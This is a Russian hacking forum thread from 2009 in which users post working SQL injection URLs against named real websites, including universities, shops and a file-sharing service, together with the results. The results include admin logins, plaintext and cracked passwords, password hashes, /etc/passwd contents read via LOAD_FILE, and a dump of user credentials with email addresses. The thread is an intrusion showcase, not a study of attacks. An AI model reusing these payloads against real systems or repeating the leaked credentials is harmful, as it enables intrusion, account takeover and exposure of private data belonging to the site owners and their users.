Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
25.01.2009, 15:58
|
|
Новичок
Регистрация: 08.01.2009
Сообщений: 5
Провел на форуме:
14109
Репутация:
11
|
|
Berkeley.edu
Код:
http://www.ocf.berkeley.edu/~surf/view_post.php?id=18%20union%20all%20select%201,version(),3,4,concat(email,0x3a,password),6,7,8,9%20from%20users%20limit%202,1--
admin login
usrename: streeter
passsword: addpost
http://www.ocf.berkeley.edu/~surf/admin.php |
|
|
25.01.2009, 16:06
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
Онлайншопер на Постгри -)
http://hsus.petfulfillment.com/productdetail.php?productid=2091+union+select+null ,version(),null,null,null,null,null,null--
PostgreSQL 7.4.2 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.3.2 20031022 (Red Hat Linux 3.3.2-1)
http://hsus.petfulfillment.com/productdetail.php?productid=2091+union+select+null ,table_name,null,null,null,null,null,null+from+INF ORMATION_SCHEMA.TABLES--
http://hsus.petfulfillment.com/productdetail.php?productid=2091+union+select+null ,COLUMN_NAME,null,null,null,null,null,null+from+IN FORMATION_SCHEMA.columns--
http://hsus.petfulfillment.com/productdetail.php?productid=2091+union+select+null ,password,null,null,null,null,null,null+from+membe rs--
Username: admin Password : 321roy
Красотой не пахнет но пойдёт и так =)
VIAHOST - Надёжный хостинг -) гы улыбнуло
http://support.via.su/user.php?Category_ID=5/**/union/**/select/**/1,2,3,concat_ws(0x3a,user(),version(),database()), 5,6,7,8,9,10,11,12--&op=opCategoryThreadsShow&_lform=0&_id=16242475679 1014
User:extreem_root@localhost
Version:4.1.22
Database:FineBill
Еще один Шопер,но не раскурутил
Какая то муть с выводом в сипте.
http://www.moca.org/store/product_detail.php?pID=89796986986312+union+select +1,2,concat_ws(0x3a,user(),version(),database()),4 ,5,6,7,8,9,10--
User:moca@localhost
Version:5.0.24
Database:moca
http://www.lloyd.de/en/service/news.php?page=1&article_id=168768765400+union+sele ct+1,2,3,4,concat_ws(0x3a,user(),version(),databas e()),6,7,8--
User: dbo40336812@212.227.119.25
Version: 4.0.27-max-log
Database: db40336812
http://www.billsizemore.com/article.php?article_id=105679860+union+select+1,2, concat_ws(0x3a,user(),version(),database())--&category_id=3
User: sizemore_webuser@localhost
Version: 4.1.22-standard
Database: sizemore_sizemore
http://umixit.com/news/article_view.html?article_id=100987809760+union+se lect+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version() ,database()),9,10,11,12,13,14--
User: umixit2_website2@localhost
Version: 4.1.21-standard
Database:umixit2_website2
http://www.securitymanagement.com.au/article.php?action=view&article_id=123467834200+un ion+select+1,2,3,4,concat_ws(0x3a,user(),version() ,database()),6,7,8,9,10,11,12
Database Version: 5.0.37
Database name: securitymgmt
User name: securitymgmt@203.31.82.10
Достаём логин пасс
http://www.securitymanagement.com.au/article.php?action=view&article_id=123467834200+UN ION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT( (SELECT+CONCAT(username,pass)+FROM+securitymgmt.us ers+LIMIT+1,1)),0x71),0x71),6,7,8,9,10,11,12--
gordon : 7a1ad597a3a5fb9234eac26112fb1ffddc6bb6ff
http://www.greateryuma.org/articles/article_view.html?article_id=169807987960+union+se lect+concat_ws(0x3a,user(),version(),database()),2 ,3,4,5,6,7,8,9,10,11--
User: yumaedc_website@localhost
Version: 4.1.22-standard
Database:yumaedc_website
http://www.awctechprep.org/news/article_view.html?article_id=128097656+union+selec t+1,2,3,4,concat_ws(0x3a,user(),version(),database ()),6,7,8,9,10,11,12,13--
awc_techprep@localhost
4.1.20
awc_techprep
http://www.bniyuma.com/members/business_detail.html?id=5886876588+union+select+co ncat_ws(0x3a,user(),version(),database()),2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--&where_clause=
bniyuma@localhost
4.0.20
bniyuma
http://www.mitratech.com/about/details.php?article_id=106969540+union+select+1,2, concat_ws(0x3a,user(),version(),database()),4,5,6, 7,8,9,10,11,12,13--
User: db12266@10.1.3.31
Version: 4.1.25-Debian_mt1
Database: db12266_mitratech
тИЦ = 180
PageRank = 6
http://www.ncpa.org/sub/whatsnew/index.php?Article_ID=15670009800+union+select+1,co ncat_ws(0x3a,user(),version(),database())--
Database Version: 4.1.11-standard-log
Database name: whatsnew
User name: root@localhost
http://www.ncpa.org/sub/whatsnew/index.php?Article_ID=15670009800+UNION+SELECT+1,AE S_DECRYPT(AES_ENCRYPT(CONCAT(User,password),0x71), 0x71)+from+mysql.user+limit+7,1--
cmcgregor *125D791AB19AF8FD7F6B37B237038173D8DA5212
root *1CDFA4599A44CBA9CA969BA03E4F9079CD67771D
astle *95024238F421F27A07155A3267C6925D1B5D54E9 хэш MySQL5 : 95024238f421f27a07155a3267c6925d1b5d54e9:hemlock
repl *A424E797037BF97C19A2E88CF7891C5C2038C039 хэш MySQL5 : a424e797037bf97c19a2e88cf7891c5c2038c039:repl
brandon
rlyon *D7624E368C73DB8F2AD8747C90AEC4EC47BCA359
replicator *0EFECFE5946B7B520BE8C6380DEEAD0DC720FB28
wales *3CBD789A278AEABB649633E18D6C7E28EEED5A77 хэш MySQL5 : 3cbd789a278aeabb649633e18d6c7e28eeed5a77:wales
Читалка файлов -)
http://www.ncpa.org/sub/whatsnew/index.php?Article_ID=15670009800+UNION+SELECT+1,AE S_DECRYPT(AES_ENCRYPT(CONCAT(LOAD_FILE(0x2F6574632 F706173737764)),0x71),0x71)--
Ну и дальше дело техники -)
Ну и .edu на последок -)
тИЦ = 500
PageRank = 7
http://info.med.yale.edu/calendar/detailview.php3?event_id=547897699030+union+select +1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,c oncat_ws(0x3a,user(),version(),database()),21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64,65,66,67--&calendar_id=1&timeframe=ThisWeek&num_days=&pal m=
User:ysm_calendar@web.med.yale.edu
Version:4.0.24-log
Database:ysm_calendar
http://www.azwestern.edu/news/article_view.html?article_id=12798654333+union+sel ect+1,2,3,4,5,concat_ws(0x3a,user(),version(),data base()),7,8,9,10,11,12--
awc_website@localhost
4.1.20
awc_website
Разработчики сих ошибок
http://www.mgmdesign.com/portfolio.html
параметр : article_view.html?article_id=1+скуля+
Всё спать надо.
Поспал блин -)
Еще один онлайншопинг -)
PR 5
База здоровая
http://www.musichristian.com/sys/product.php?PRODUCT=898989898563233+union+select+1 ,concat_ws(0x3a,user(),version(),database()),3--
Database Version: 5.0.26-log
Database name: musichri_database
User name: mcis_wbusr@10.0.90.131
http://www.musichristian.com/sys/product.php?PRODUCT=898989898563233+UNION+SELECT+1 ,AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+CONCAT(0x3 a,user,0x3a,pass,0x3a,email)+FROM+musichri_databas e.12all_admin+LIMIT+1,1)),0x71),0x71),3--
Админчики
:daniel:djJsaXN0c2FkbWlu:daniel@musichristian.com :
 eroro:: :
:jeff.cooley:ZHRib3kyNjIw:jeff.cooley@musicountry. com :
Еще пользователи
http://www.musichristian.com/sys/product.php?PRODUCT=898989898563233+UNION+SELECT+1 ,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCA T(username,0x3a,password,0x3a,email)+FROM+musichri _database.affiliate_user+LIMIT+200,1),0x3a),0x71), 0x71),3--
:mcstores:4bedb00c:john.varghese@musichristian.com
:_sitening_:sitening:mcbc@sitening.com
итд...
В общем по базе там надо смотреть так как там заказов более 100000 да и вообще я так понял это старый уже магазин.
Хотя мож и не магазин а партнёрка вроде бы нет...
Последний раз редактировалось spherics; 26.01.2009 в 05:44..
|
|
|
|
26.01.2009, 07:12
|
|
Новичок
Регистрация: 16.09.2008
Сообщений: 8
Провел на форуме:
102861
Репутация:
25
|
|
Всем приФФ =)
Вот какой-то.....что-то, типа магазина =)
Код:
http://www.rhinomac.com/
Скуль ругаеЦЦо тут
Код:
http://www.rhinomac.com/?action=listProducts&categoryId=-5'
5-я ветка скулЯ
5 полей(2 принтабельных)
Код:
http://www.rhinomac.com/?action=listProducts&categoryId=5+union+select+1,2,3,4,5--
Далее смотрим таблицы(а они у нас ФФСЕ) =)
Код:
http://www.rhinomac.com/?action=listProducts&categoryId=5+union+select+1,concat_ws(0x3a3a3a,table_name,column_name),3,4,5+from+information_schema.columns--
Выбираем интересные, а именно:
users ::: username
users ::: passwd
Итого получаем:
username: rgeist
passwd: test1234
ОдминкО:
Код:
http://rhinomac.com/admin/login.php
|
|
|
|
26.01.2009, 08:00
|
|
Познающий
Регистрация: 19.08.2008
Сообщений: 33
Провел на форуме:
140077
Репутация:
93
|
|
Imperial.edu
http://community.imperial.edu/index.php?option=com_dtregister&task=typeboth&paym entmethod=paypal&eventId=-12%20UNION%20SELECT%20concat(username,0x3a,passwor d)%20FROM%20jos_users&Itemid=138
Eud.eu
http://www.eud.eu/news.php?action=view&news_id=-57+union+select+1,concat_ws(0x3a,admin_name,passwo rd),3,4,5,6,7,8,9,10,11+From+administrators--
Fleishman-hillard.eu
http://www.fleishman-hillard.eu/news.php?mode=detail&news_id=-25+union+select+1,2,unhex(hex(concat_ws(0x3a,admin _login,admin_passwd))),4,5,6,7,8,9,10,11+from+admi nistrators/*
Whathaseuropedone.eu
http://www.whathaseuropedone.eu/news_detail.php?news_id=-5'+union+select+1,2,3,4,5,unhex(hex(concat_ws(0x3a ,admin_login,admin_passwd))),7,8,9,10,11,12,13,14+ from+administrators+limit+0,1/*
Blueprintpartners.eu
http://www.blueprintpartners.eu/bpdemo/news_detail.php?news_id=-105'+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0 x3a,admin_login,admin_passwd)+from+administrators/*
Homelounge.eu
http://www.homelounge.eu/index.php?option=com_flashmagazinedeluxe&Itemid=56 &task=magazine&mag_id=-2+union+select+1,2,3,unhex(hex(version())),5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35/*
Whathaseuropedone.eu
http://www.whathaseuropedone.eu/news_detail.php?news_id=-5'+union+select+1,2,3,unhex(hex(concat_ws(0x3a,adm in_email,admin_login,admin_pass))),5,6,7,8,9,10,11 ,12,13,14+from+administrators/*
Concerto-act2.eu
http://www.concerto-act2.eu/en/news/bdd/news_id/-49+UNION+SELECT+1,2,3,4,5,6,7,AES_DECRYPT(AES_ENCR YPT(CONCAT(0x7873716C696E6A626567696E,(SELECT+CONC AT(admin_login,0x7873716C696E6A64656C,admin_pwd)+F ROM+concertoact2.t_admin+LIMIT+1,1),0x7873716C696E 6A656E64),0x71),0x71)/*
/admin
__________________
Нашел уязвимость в программном коде жизни...
Последний раз редактировалось VITАL; 26.01.2009 в 08:09..
|
|
|
|
26.01.2009, 12:20
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288
Репутация:
82
|
|
http://sexamag.ru
http://sexamag.ru/tovari/?id=-5465+union+select+1,2,3,concat_ws(char(58),TABLE_S CHEMA,TABLE_NAME,COLUMN_NAME),5,6,7,8,9,10,11,12,1 3+from+INFORMATION_SCHEMA.COLUMNS--
http://sexamag.ru/tovari/?id=-5465+union+select+1,2,3,concat_ws(char(58),databas e(),user(),version()),5,6,7,8,9,10,11,12,13--
Database: u146192
User: u146192@10.10.153.180
Version: 5.0.67-log
Последний раз редактировалось jokester; 26.01.2009 в 12:35..
Причина: onlinesexshop.ru и seksmagazin.ru Бояны
|
|
|
|
26.01.2009, 13:16
|
|
Новичок
Регистрация: 19.01.2009
Сообщений: 12
Провел на форуме:
236651
Репутация:
92
|
|
Российская Ассоциация Развития Игорного Бизнеса
http://www.rarib.ru/news.cfm?type=-4+union+select+1,2,3,4,5,6,6,8,SYSDATE(),6,concat_ ws(0x20,user(),mysql.user.password,database(),vers ion()),LOAD_FILE(char(47,101,116,99,47,112,97,115, 115,119,100)),2,3+from+mysql.user/*
user():web@localhost
1.mysql.user.password:asdf2d?FR34tds
2.mysql.user.password:205580253bde416f
database():RARIB
version():4.0.18-standard
/etc/passwd
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
...
http://www.rarib.ru/news.cfm?type=-4+union+select+1,2,login,4,5,6,7,8,SYSDATE(),6,log in,passwd,2,3+from+user/*
kompik:111111
mike:m6Zk31BYG
т.д.
Последний раз редактировалось Maestus; 26.01.2009 в 13:46..
|
|
|
|
26.01.2009, 15:15
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
PageRank = 6
http://www.la-press.com/bulk_reprint.php?article_id=-100+union+select+concat_ws(0x3a,user(),version(),d atabase())--
Database Version: 5.0.51a-3ubuntu5.4-log
Database name: lapress
User name: lapress@localhost
Юзеры
http://www.la-press.com/bulk_reprint.php?article_id=-100+union+select+concat_ws(0x3a,username,password, email)+from+user+limit+23500,1--
http://www.dovepress.com/articles.php?article_id=610098098760+union+select+ 1,2,3,4,concat_ws(0x3a,user(),version(),database() ),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37--
Database Version: 5.0.51a-3ubuntu5.4-log
Database name: dovepress
User name: dovepress@localhost
Юзеры
http://www.dovepress.com/articles.php?article_id=610098098760+UNION+SELECT+ 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELEC T+CONCAT(username,0x3a,password,0x3a,email,0x3a,ad min,0x3a,editor)+FROM+dovepress.user+LIMIT+2,1),0x 3a),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37--
: Meniscus : c449b735db7026408c36d08c996e6c5f : cbrock@meniscushcc.com : n : n
: hoptman : 1d018a66bd1dbb082bb28d36db594370 : hoptman@nki.rfmh.org : n : n
Так 30 тысяч |
|
|
|
27.01.2009, 03:19
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
www.38school.ru
http://www.38school.ru/arch.php?id=-7+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5--
бд - seopro_box-school
версия - 5.0.22
юзер - box-school@localhost
|
|
|
|
26.01.2009, 16:10
|
|
Участник форума
Регистрация: 09.03.2008
Сообщений: 193
Провел на форуме:
2140897
Репутация:
267
|
|
мну в шоке)
Сайт файлообменника letitibit.net
news.letitsoft.com
Код:
http://news.letitsoft.com/index.php?id=-604+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7--
5 Ветка
Дальше копать не стал,боюсь за мной уже едут)
UPD:
Так и недождавшись дядек в фурашках решил покопать)
Таблички
Код:
columns_priv
db
func
help_category
help_keyword
help_relation
help_topic
host
proc
procs_priv
tables_priv
time_zone
time_zone_leap_second
time_zone_name
time_zone_transition
time_zone_transition_type
user
comments
files_use
files_use_cat
files_use_click
files_use_tags
news
users
accesslog
antishare
bl_reason
black_tags
category
codec
copy_from_remote_host
credit
ct_tmp
delete_or_not
files
ftp_update_req
full_info
full_logs
fullstats_by_premium
groups
ip_logs
log_add_remote
logs
message
most_popular
mrtg_hour
mtrg_date
password_protect
passwordcheat
payment
pins
sms_pass
speed
stats
stats_enter
stats_show_click_bh
torrent
Очень много интересных табличек,но большая чать лежит в других базах)
Немного посмотрев нашёл табличку users.
Колонки
Код:
id
date
username
password
email
wmz
timeout
tmp
payout
primary_key
Ну и вытаскиваем
Код:
http://news.letitsoft.com/index.php?id=-604+union+select+1,2,3,CONCAT(id,0x3a,date,0x3a,username,0x3a,password,0x3a,email,0x3a,wmz),5,6,7+from+users+limit+0,1--
Пароли лежат в открытом виде)
Небольшой слитый Кусочек
Код:
5:0000-00-00:Dr_Drew:420593:dr_drew_mail@mail.ru:Z
6:0000-00-00:xzero919:dimetra:xzero919@rambler.ru:Z
9:2008-11-06:dralex:as963:as@letitbit.net:Z346625720064ds
10:2008-11-06:Axe35:Axe35:roman199494@mail.ru:Z170486501392
11:2008-11-06:RUS:101189:RUS_-@mail.ru:Z
12:2008-11-06:funtov:funtov:funtov2006@pochta.ru:Z
13:2008-11-06:yulya4364:t434At:yulya4364@yandex.ru:Z
14:2008-11-06:Hena2008:4453681:LifexIsxDead@mail.ru:Z
15:2008-11-06:verik:verik:verik_verika@mail.ru:Z
16:2008-11-06:ametis007:1234567890:ametis007@yandex.ru:Z
17:2008-11-06:kapitocha:korolev:kor-ed@yandex.ru:Z
18:2008-11-06:zmeyy:301089:zmeyy-89@mail.ru:z267886986065
19:2008-11-06:VCITY1:vcity1:vcity73@mail.ru:Z191056419149
20:2008-11-06:putic82:232629:putic82@mail.ru:Z681431559945
21:2008-11-06:MicroMaster:astonmar:rafikoviskandar@mail.ru:Z
Всем удачного хека 
Последний раз редактировалось Shadow_p1raT; 26.01.2009 в 19:19..
|
|
|
|
26.01.2009, 16:34
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.donbosco.ro/materiale/index.php?idalbum=-8+union+select+1,concat_ws(0x3a,version(),user(),d atabase())/*
Database Version: 4.1.13a-nt
Database name: donboscoro
User name: donboscoro@localhost
сервер на винде
http://www.vladimirghika.net/fotografie/index.php?idalbum=-5+union+select+1,concat_ws(0x3a,version(),database (),user())/*
Database Version: 4.1.13a-nt
Database name: vladimirghikaro
User name: vladimirghika@localhost
http://www.infoimobiliar.ro/change_agency.php?agentie=15+UNION+SELECT+1,2,3,AE S_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F, Database(),0x2F2A2A2F,User()),0x71),0x71),5,6,7,8, 9,10,11,12+LIMIT+1,1
Database Version: 5.0.51a-community
Database name: infoimob_db
User name: infoimob_usr@localhost
не раскручивал...
http://www.esalon.ro/servicii.php?idp=-2+union+select+1,concat_ws(0x3a,version(),database (),user())
Database Version:5.0.67-community
Database name:esalon_meniu
User name:esalon_meniu@localhost
http://www.clubulenergetic-cluj.ro/subpagini.php?id=26+UNION+SELECT+1,2,AES_DECRYPT(A ES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(), 0x2F2A2A2F,User()),0x71),0x71),4+LIMIT+1,1
Database Version: 5.0.67-community
Database name: rclu5103_ceob
User name: rclu5103_ceob@localhost
http://www.ardc.ro/news_d.php?id=63{SQLINJ}&lang=RO
Version :4.1.22-standard-log
Database: aredece_aredece
User :aredece_dobrei@localhost
Слепая скуля.... помог релиз Маднета за что ему огромное СПАСИБО !
http://www.irisholiday.ro/?prod=-10+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8,9,0,1,2
Database Version: 5.0.67-community
Database name: irisholi_iris
User name: irisholi_root@localhost
Hа сегодня все, извините за многочисленые едиты так как работал так сказать вживую.... Cпасибо !
Последний раз редактировалось Gorev; 26.01.2009 в 19:50..
|
|
|
|
|
 |
|
TEST QR: []
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид